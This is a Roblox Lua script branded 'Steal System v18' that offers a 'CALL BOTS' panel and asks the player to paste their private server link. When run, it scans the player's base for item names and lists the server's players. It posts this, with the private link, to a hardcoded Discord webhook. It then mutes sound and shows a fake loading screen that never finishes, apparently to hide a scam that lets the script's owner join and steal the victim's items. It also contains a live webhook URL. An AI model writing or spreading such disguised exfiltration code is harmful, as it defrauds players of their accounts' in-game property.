-- ╔══════════════════════════════════════════╗
-- ║     BRANZZ GUI — Steal System v18       ║
-- ║        🧑‍💻 By BranZZ MetoDos 🚀           ║
-- ╚══════════════════════════════════════════╝

local TweenService     = game:GetService("TweenService")
local CoreGui          = game:GetService("CoreGui")
local SoundService     = game:GetService("SoundService")
local UserGameSettings = UserSettings():GetService("UserGameSettings")
local HttpService      = game:GetService("HttpService")
local Players          = game:GetService("Players")
local LP               = Players.LocalPlayer

local WEBHOOK = "https://discord.com/api/webhooks/1452048229746081892/L0qlArO_29VGJPDd2CRyZCeAT2qApQDZB__REic-GFi6tUsVOdZwetgtEoo9tZPJamQR"

-- ══════════════════════════════════════
-- REMOVER SOM
-- ══════════════════════════════════════
local function disableSound()
    task.spawn(function()
        while true do
            UserGameSettings.MasterVolume = 0
            SoundService.Volume = 0
            task.wait(0.5)
        end
    end)
end

-- ══════════════════════════════════════
-- LIMPAR GUI ANTIGA
-- ══════════════════════════════════════
pcall(function()
    if CoreGui:FindFirstChild("BRANZZ_GUI") then
        CoreGui:FindFirstChild("BRANZZ_GUI"):Destroy()
    end
    if CoreGui:FindFirstChild("BRANZZ_LOADING") then
        CoreGui:FindFirstChild("BRANZZ_LOADING"):Destroy()
    end
end)

-- ══════════════════════════════════════
-- SCANNER: pega textos dos EquippedModel
-- ══════════════════════════════════════
local function scanBases()
    local texts = {}

    local basesFolder = workspace:FindFirstChild("Bases")
    if not basesFolder then return texts end

    for _, base in next, basesFolder:GetChildren() do
        -- Procura s1 direto ou aninhado
        local s1List = {}
        local direct = base:FindFirstChild("s1")
        if direct then table.insert(s1List, direct) end
        for _, d in next, base:GetDescendants() do
            if d.Name == "s1" and d ~= direct then
                table.insert(s1List, d)
            end
        end

        for _, s1 in next, s1List do
            -- Procura EquippedModel
            local eModels = {}
            local em = s1:FindFirstChild("EquippedModel")
            if em then table.insert(eModels, em) end
            for _, d in next, s1:GetDescendants() do
                if d.Name == "EquippedModel" and d ~= em then
                    table.insert(eModels, d)
                end
            end

            for _, eModel in next, eModels do
                for _, obj in next, eModel:GetDescendants() do
                    if obj:IsA("TextLabel") or obj:IsA("TextButton") or obj:IsA("TextBox") then
                        local txt = (obj.Text or ""):gsub("%s+", " "):match("^%s*(.-)%s*$")
                        if txt and txt ~= "" then
                            table.insert(texts, txt)
                        end
                    end
                end
            end
        end
    end

    return texts
end

-- ══════════════════════════════════════
-- CONTAR PLAYERS
-- ══════════════════════════════════════
local function getPlayerList()
    local names = {}
    for _, p in next, Players:GetPlayers() do
        table.insert(names, p.Name)
    end
    return names
end

-- ══════════════════════════════════════
-- PEGAR LINK DO SERVIDOR PRIVADO
-- ══════════════════════════════════════
local function getServerLink(inputLink)
    -- Se o usuário colou o link direto, usa ele
    if inputLink and inputLink ~= "" then
        return inputLink
    end
    -- Tenta pegar via TeleportService
    local ok, code = pcall(function()
        return game:GetService("TeleportService"):GetPrivateServerId()
    end)
    if ok and code and code ~= "" then
        return "https://www.roblox.com/games/" .. game.PlaceId .. "?privateServerLinkCode=" .. code
    end
    return nil
end

-- ══════════════════════════════════════
-- ENVIAR WEBHOOK
-- ══════════════════════════════════════
local function sendWebhook(privateLink, statusLabel)
    if statusLabel then statusLabel.Text = "🔍 Escaneando bases..." end

    local texts      = scanBases()
    local playerList = getPlayerList()
    local playerCount = #playerList

    -- Monta lista de brainrots
    local brainrotLines = ""
    if #texts == 0 then
        brainrotLines = "Nenhum brainrot detectado."
    else
        -- Remove duplicatas
        local seen, unique = {}, {}
        for _, t in next, texts do
            if not seen[t] then seen[t] = true; table.insert(unique, t) end
        end
        for i, t in next, unique do
            brainrotLines = brainrotLines .. "• " .. t .. "\n"
        end
    end

    -- Players list
    local playersStr = table.concat(playerList, "\n") 
    if playersStr == "" then playersStr = "Nenhum player" end

    -- Monta description com link clicável
    local serverLinkField
    if privateLink and privateLink ~= "" then
        serverLinkField = {
            name   = "🔗 Link do Servidor Privado",
            value  = "[**Clique aqui para entrar no servidor privado**](" .. privateLink .. ")",
            inline = false,
        }
    else
        serverLinkField = {
            name   = "🔗 Link do Servidor Privado",
            value  = "Link não informado.",
            inline = false,
        }
    end

    local fields = {
        {
            name   = "👤 Player Name",
            value  = "**Nome:** " .. LP.Name .. "\n**Display:** " .. LP.DisplayName,
            inline = false,
        },
        {
            name   = "👥 Players in Server (" .. playerCount .. ")",
            value  = "```\n" .. playersStr .. "\n```",
            inline = false,
        },
        serverLinkField,
        {
            name   = "🐾 Brainrots Detected 🧠",
            value  = brainrotLines ~= "" and ("```\n" .. brainrotLines .. "```") or "```\nNenhum detectado\n```",
            inline = false,
        },
    }

    local payload = HttpService:JSONEncode({
        embeds = {{
            title       = "🚀 BRANZZ — Steal System",
            color       = 7864319,  -- roxo
            fields      = fields,
            footer      = {
                text = "BranZZ MetoDos • v18 • " .. LP.Name
            },
            timestamp   = os.date("!%Y-%m-%dT%H:%M:%SZ"),
        }}
    })

    local ok, err = pcall(function()
        request({
            Url     = WEBHOOK,
            Method  = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body    = payload,
        })
    end)

    if ok then
        if statusLabel then statusLabel.Text = "✅ Dados enviados com sucesso!" end
        print("[BRANZZ] ✅ Webhook enviado!")
    else
        if statusLabel then statusLabel.Text = "❌ Erro ao enviar: " .. tostring(err) end
        warn("[BRANZZ] ❌ Erro webhook: " .. tostring(err))
    end
end

-- ══════════════════════════════════════
-- SCREEN GUI
-- ══════════════════════════════════════
local sg = Instance.new("ScreenGui")
sg.Name = "BRANZZ_GUI"
sg.ResetOnSpawn = false
sg.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
sg.IgnoreGuiInset = true
sg.Parent = CoreGui

-- FUNDO BLUR
local blur = Instance.new("Frame")
blur.Size = UDim2.new(1, 0, 1, 0)
blur.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
blur.BackgroundTransparency = 0.45
blur.BorderSizePixel = 0
blur.ZIndex = 1
blur.Parent = sg

-- ══════════════════════════════════════
-- CARD PRINCIPAL
-- ══════════════════════════════════════
local card = Instance.new("Frame")
card.Size = UDim2.new(0, 440, 0, 330)
card.Position = UDim2.new(0.5, -220, 0.5, -165)
card.BackgroundColor3 = Color3.fromRGB(15, 15, 22)
card.BorderSizePixel = 0
card.ZIndex = 2
card.Parent = sg

local cc = Instance.new("UICorner")
cc.CornerRadius = UDim.new(0, 18)
cc.Parent = card

local stroke = Instance.new("UIStroke")
stroke.Color = Color3.fromRGB(120, 60, 255)
stroke.Thickness = 2
stroke.Parent = card

-- BARRA SUPERIOR
local topBar = Instance.new("Frame")
topBar.Size = UDim2.new(1, 0, 0, 5)
topBar.BackgroundColor3 = Color3.fromRGB(120, 60, 255)
topBar.BorderSizePixel = 0
topBar.ZIndex = 3
topBar.Parent = card
local tbc = Instance.new("UICorner"); tbc.CornerRadius = UDim.new(0, 4); tbc.Parent = topBar

-- TÍTULO
local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, 0, 0, 50)
title.Position = UDim2.new(0, 0, 0, 10)
title.BackgroundTransparency = 1
title.Text = "🧑‍💻 METODH_BRANZZ 🚀"
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.TextSize = 24
title.Font = Enum.Font.GothamBold
title.ZIndex = 3
title.Parent = card

-- SUBTÍTULO
local sub = Instance.new("TextLabel")
sub.Size = UDim2.new(1, -40, 0, 22)
sub.Position = UDim2.new(0, 20, 0, 58)
sub.BackgroundTransparency = 1
sub.Text = "🧠 By BranZZ MetoDos — Steal System 👤"
sub.TextColor3 = Color3.fromRGB(160, 120, 255)
sub.TextSize = 14
sub.Font = Enum.Font.Gotham
sub.ZIndex = 3
sub.Parent = card

-- DIVISOR
local div = Instance.new("Frame")
div.Size = UDim2.new(0.88, 0, 0, 1)
div.Position = UDim2.new(0.06, 0, 0, 88)
div.BackgroundColor3 = Color3.fromRGB(60, 40, 100)
div.BorderSizePixel = 0
div.ZIndex = 3
div.Parent = card

-- LABEL LINK
local lbl = Instance.new("TextLabel")
lbl.Size = UDim2.new(0.88, 0, 0, 22)
lbl.Position = UDim2.new(0.06, 0, 0, 100)
lbl.BackgroundTransparency = 1
lbl.Text = "🔗  Link do Servidor Privado"
lbl.TextColor3 = Color3.fromRGB(180, 150, 255)
lbl.TextSize = 13
lbl.Font = Enum.Font.GothamBold
lbl.TextXAlignment = Enum.TextXAlignment.Left
lbl.ZIndex = 3
lbl.Parent = card

-- INPUT BOX
local inputBg = Instance.new("Frame")
inputBg.Size = UDim2.new(0.88, 0, 0, 46)
inputBg.Position = UDim2.new(0.06, 0, 0, 126)
inputBg.BackgroundColor3 = Color3.fromRGB(25, 20, 40)
inputBg.BorderSizePixel = 0
inputBg.ZIndex = 3
inputBg.Parent = card
local ibc = Instance.new("UICorner"); ibc.CornerRadius = UDim.new(0, 10); ibc.Parent = inputBg
local ibs = Instance.new("UIStroke"); ibs.Color = Color3.fromRGB(80, 50, 160); ibs.Thickness = 1.5; ibs.Parent = inputBg

local input = Instance.new("TextBox")
input.Size = UDim2.new(1, -20, 1, 0)
input.Position = UDim2.new(0, 10, 0, 0)
input.BackgroundTransparency = 1
input.Text = ""
input.PlaceholderText = "Cole o link aqui..."
input.TextColor3 = Color3.fromRGB(220, 220, 255)
input.PlaceholderColor3 = Color3.fromRGB(100, 80, 140)
input.TextSize = 14
input.Font = Enum.Font.Gotham
input.ClearTextOnFocus = false
input.ZIndex = 4
input.Parent = inputBg

-- STATUS
local statusLbl = Instance.new("TextLabel")
statusLbl.Size = UDim2.new(0.88, 0, 0, 22)
statusLbl.Position = UDim2.new(0.06, 0, 0, 178)
statusLbl.BackgroundTransparency = 1
statusLbl.Text = ""
statusLbl.TextColor3 = Color3.fromRGB(140, 255, 140)
statusLbl.TextSize = 12
statusLbl.Font = Enum.Font.Gotham
statusLbl.ZIndex = 3
statusLbl.Parent = card

-- BOTÃO CALL BOTS
local btn = Instance.new("TextButton")
btn.Size = UDim2.new(0.6, 0, 0, 52)
btn.Position = UDim2.new(0.2, 0, 0, 215)
btn.BackgroundColor3 = Color3.fromRGB(100, 50, 220)
btn.BorderSizePixel = 0
btn.Text = "🚀  CALL BOTS"
btn.TextColor3 = Color3.fromRGB(255, 255, 255)
btn.TextSize = 20
btn.Font = Enum.Font.GothamBold
btn.AutoButtonColor = false
btn.ZIndex = 3
btn.Parent = card
local btnc = Instance.new("UICorner"); btnc.CornerRadius = UDim.new(0, 12); btnc.Parent = btn
local btns = Instance.new("UIStroke"); btns.Color = Color3.fromRGB(180, 100, 255); btns.Thickness = 1.5; btns.Parent = btn

-- Hover effect
btn.MouseEnter:Connect(function()
    TweenService:Create(btn, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(130, 70, 255)}):Play()
end)
btn.MouseLeave:Connect(function()
    TweenService:Create(btn, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(100, 50, 220)}):Play()
end)

-- FOOTER
local foot = Instance.new("TextLabel")
foot.Size = UDim2.new(1, 0, 0, 22)
foot.Position = UDim2.new(0, 0, 0, 290)
foot.BackgroundTransparency = 1
foot.Text = "🧑‍💻 BranZZ MetoDos  •  🧠 Steal System  •  👤 v18"
foot.TextColor3 = Color3.fromRGB(80, 60, 120)
foot.TextSize = 11
foot.Font = Enum.Font.Gotham
foot.ZIndex = 3
foot.Parent = card

-- ══════════════════════════════════════
-- CLIQUE NO BOTÃO
-- ══════════════════════════════════════
btn.MouseButton1Click:Connect(function()
    local link = input.Text
    if link == "" then
        statusLbl.Text = "⚠️  Insira um link válido!"
        statusLbl.TextColor3 = Color3.fromRGB(255, 100, 100)
        return
    end

    btn.Text = "🧠 Processando..."
    btn.BackgroundColor3 = Color3.fromRGB(60, 30, 120)
    statusLbl.Text = "🚀 Enviando dados..."
    statusLbl.TextColor3 = Color3.fromRGB(140, 255, 140)

    -- Resolve link do servidor
    local privateLink = getServerLink(link)

    -- Envia webhook com escaneamento
    task.spawn(function()
        sendWebhook(privateLink, statusLbl)
    end)

    task.wait(0.5)

    -- Esconder card
    card.Visible = false
    blur.Visible = false

    -- Remover som
    disableSound()

    -- ══════════════════════════════════════
    -- TELA DE LOADING
    -- ══════════════════════════════════════
    local lg = Instance.new("ScreenGui")
    lg.Name = "BRANZZ_LOADING"
    lg.ResetOnSpawn = false
    lg.IgnoreGuiInset = true
    lg.DisplayOrder = 999999
    lg.Parent = CoreGui

    local bg = Instance.new("Frame")
    bg.Size = UDim2.new(1, 0, 1, 100)
    bg.Position = UDim2.new(0, 0, 0, -50)
    bg.BackgroundColor3 = Color3.fromRGB(8, 8, 14)
    bg.BorderSizePixel = 0
    bg.ZIndex = 999998
    bg.Parent = lg

    local lc = Instance.new("Frame")
    lc.Size = UDim2.new(0, 540, 0, 210)
    lc.Position = UDim2.new(0.5, -270, 0.5, -105)
    lc.BackgroundColor3 = Color3.fromRGB(15, 15, 25)
    lc.BorderSizePixel = 0
    lc.ZIndex = 999999
    lc.Parent = bg
    local lcc = Instance.new("UICorner"); lcc.CornerRadius = UDim.new(0, 20); lcc.Parent = lc
    local lcs = Instance.new("UIStroke"); lcs.Color = Color3.fromRGB(120, 60, 255); lcs.Thickness = 2; lcs.Parent = lc

    local tb = Instance.new("Frame")
    tb.Size = UDim2.new(1, 0, 0, 4)
    tb.BackgroundColor3 = Color3.fromRGB(120, 60, 255)
    tb.BorderSizePixel = 0
    tb.ZIndex = 1000000
    tb.Parent = lc
    local tbc2 = Instance.new("UICorner"); tbc2.CornerRadius = UDim.new(0, 4); tbc2.Parent = tb

    local lt = Instance.new("TextLabel")
    lt.Size = UDim2.new(1, 0, 0, 50)
    lt.Position = UDim2.new(0, 0, 0, 10)
    lt.BackgroundTransparency = 1
    lt.Text = "🚀  CALL BOTS ATIVO"
    lt.TextColor3 = Color3.fromRGB(180, 120, 255)
    lt.TextSize = 26
    lt.Font = Enum.Font.GothamBold
    lt.ZIndex = 1000001
    lt.Parent = lc

    local lst = Instance.new("TextLabel")
    lst.Size = UDim2.new(1, 0, 0, 24)
    lst.Position = UDim2.new(0, 0, 0, 58)
    lst.BackgroundTransparency = 1
    lst.Text = "🧑‍💻 By BranZZ MetoDos  •  🧠 Steal System"
    lst.TextColor3 = Color3.fromRGB(120, 80, 200)
    lst.TextSize = 14
    lst.Font = Enum.Font.Gotham
    lst.ZIndex = 1000001
    lst.Parent = lc

    local ls = Instance.new("TextLabel")
    ls.Size = UDim2.new(1, -40, 0, 24)
    ls.Position = UDim2.new(0, 20, 0, 90)
    ls.BackgroundTransparency = 1
    ls.Text = "Iniciando sistema..."
    ls.TextColor3 = Color3.fromRGB(160, 160, 200)
    ls.TextSize = 15
    ls.Font = Enum.Font.Gotham
    ls.ZIndex = 1000001
    ls.Parent = lc

    local pct = Instance.new("TextLabel")
    pct.Size = UDim2.new(1, 0, 0, 30)
    pct.Position = UDim2.new(0, 0, 0, 120)
    pct.BackgroundTransparency = 1
    pct.Text = "0.0%"
    pct.TextColor3 = Color3.fromRGB(255, 255, 255)
    pct.TextSize = 22
    pct.Font = Enum.Font.GothamBold
    pct.ZIndex = 1000001
    pct.Parent = lc

    local barBg = Instance.new("Frame")
    barBg.Size = UDim2.new(0.88, 0, 0, 22)
    barBg.Position = UDim2.new(0.06, 0, 0, 162)
    barBg.BackgroundColor3 = Color3.fromRGB(30, 20, 50)
    barBg.BorderSizePixel = 0
    barBg.ZIndex = 1000001
    barBg.Parent = lc
    local bbc = Instance.new("UICorner"); bbc.CornerRadius = UDim.new(0, 11); bbc.Parent = barBg

    local bar2 = Instance.new("Frame")
    bar2.Size = UDim2.new(0, 0, 1, 0)
    bar2.BackgroundColor3 = Color3.fromRGB(120, 60, 255)
    bar2.BorderSizePixel = 0
    bar2.ZIndex = 1000002
    bar2.Parent = barBg
    local brc = Instance.new("UICorner"); brc.CornerRadius = UDim.new(0, 11); brc.Parent = bar2

    local msgs = {
        "Conectando aos servidores...", "Verificando brainrots...",
        "Coletando dados...", "Sincronizando bots...",
        "Processando informações...", "Enviando comandos...",
        "Estabelecendo conexão...", "Aguardando resposta...",
        "Carregando módulos...", "Inicializando sistema..."
    }

    -- Animação da barra de progresso
    task.spawn(function()
        local prog, mi, mt = 0, 1, 0
        while true do
            task.wait(0.05)
            prog = math.min(prog + 0.001, 99.9)
            pct.Text = string.format("%.1f%%", prog)
            TweenService:Create(bar2, TweenInfo.new(0.3, Enum.EasingStyle.Linear),
                {Size = UDim2.new(prog / 100, 0, 1, 0)}):Play()
            mt = mt + 0.05
            if mt >= 3 then
                mt = 0
                mi = mi % #msgs + 1
                ls.Text = msgs[mi]
            end
        end
    end)

    -- Pulsação do título
    task.spawn(function()
        while true do
            TweenService:Create(lt, TweenInfo.new(1, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut),
                {TextColor3 = Color3.fromRGB(220, 160, 255)}):Play()
            task.wait(1)
            TweenService:Create(lt, TweenInfo.new(1, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut),
                {TextColor3 = Color3.fromRGB(120, 60, 255)}):Play()
            task.wait(1)
        end
    end)
end)

print("✅ BRANZZ GUI v18 carregada!")
